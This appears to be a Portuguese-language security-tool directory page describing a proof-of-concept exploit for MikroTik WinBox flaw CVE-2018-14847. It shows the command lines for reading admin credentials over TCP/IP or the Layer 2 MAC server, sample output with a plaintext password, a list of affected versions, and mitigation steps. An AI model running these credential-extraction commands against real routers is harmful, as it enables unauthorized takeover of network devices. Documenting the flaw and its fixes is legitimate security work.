Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Mikrotik-router-hack — Prova de conceito de exploit para CVE-2018-14847 (vulnerabilidade do MikroTik WinBox) que permite leitura arbitrária de arquivos e extração de senhas em texto puro via TCP/IP ou servidor MAC da Camada 2. | Kitploit
Ferramentas/GitHubGitHub/hacker30468/mikrotik-router-hack
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de Penetração
GitHubhacker30468/mikrotik-router-hack

Mikrotik-router-hack

Prova de conceito de exploit para CVE-2018-14847 (vulnerabilidade do MikroTik WinBox) que permite leitura arbitrária de arquivos e extração de senhas em texto puro via TCP/IP ou servidor MAC da Camada 2.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
552319há 5 anosRevisado pelo Kitploit

WinboxExploit

Este é uma prova de conceito da vulnerabilidade crítica do WinBox (CVE-2018-14847) que permite a leitura arbitrária de arquivos de senhas em texto simples.

A vulnerabilidade foi corrigida há muito tempo, então este projeto foi encerrado e não será mais suportado ou atualizado. Você pode fazer um fork e atualizá-lo você mesmo.

Postagem no blog

https://n0p.me/winbox-bug-dissection/

Requisitos

  • Python 3+

Este script NÃO funcionará com Python 2.x ou inferior.

Como Usar

O script é usado de maneira simples com argumentos simples na linha de comando.

WinBox (TCP/IP)

Explora a vulnerabilidade e lê a senha.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Exemplo:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

Servidor MAC WinBox (Camada 2)

Você pode extrair arquivos mesmo que o dispositivo não tenha um endereço IP.

Verificação simples de descoberta para dispositivos Mikrotik conectados localmente.

root@kitploit:~
python3 MACServerDiscover.py

Exemplo:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Explora a vulnerabilidade e lê a senha.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Exemplo:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versões Vulneráveis

Todas as versões do RouterOS de 2015-05-28 a 2018-04-20 são vulneráveis a este exploit.

Dispositivos Mikrotik executando versões do RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Para mais informações, veja: https://blog.mikrotik.com/security/winbox-vulnerability.html

Técnicas de Mitigação

  • Atualizar o roteador para uma versão do RouterOS que inclua a correção.
  • Desabilitar o serviço WinBox no roteador.
  • Você pode restringir o acesso ao serviço WinBox a endereços IP específicos com o seguinte:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Você pode usar algumas Regras de Filtro (ACL) para negar acesso externo ao serviço WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limitar o acesso ao serviço mac-winbox pode ser feito especificando interfaces permitidas:
root@kitploit:~
/tool mac-server mac-winbox

Direitos Autorais

  • Patrocinado pelo CERTCC do Irã (https://certcc.ir). Todos os direitos reservados.
Baixar ferramenta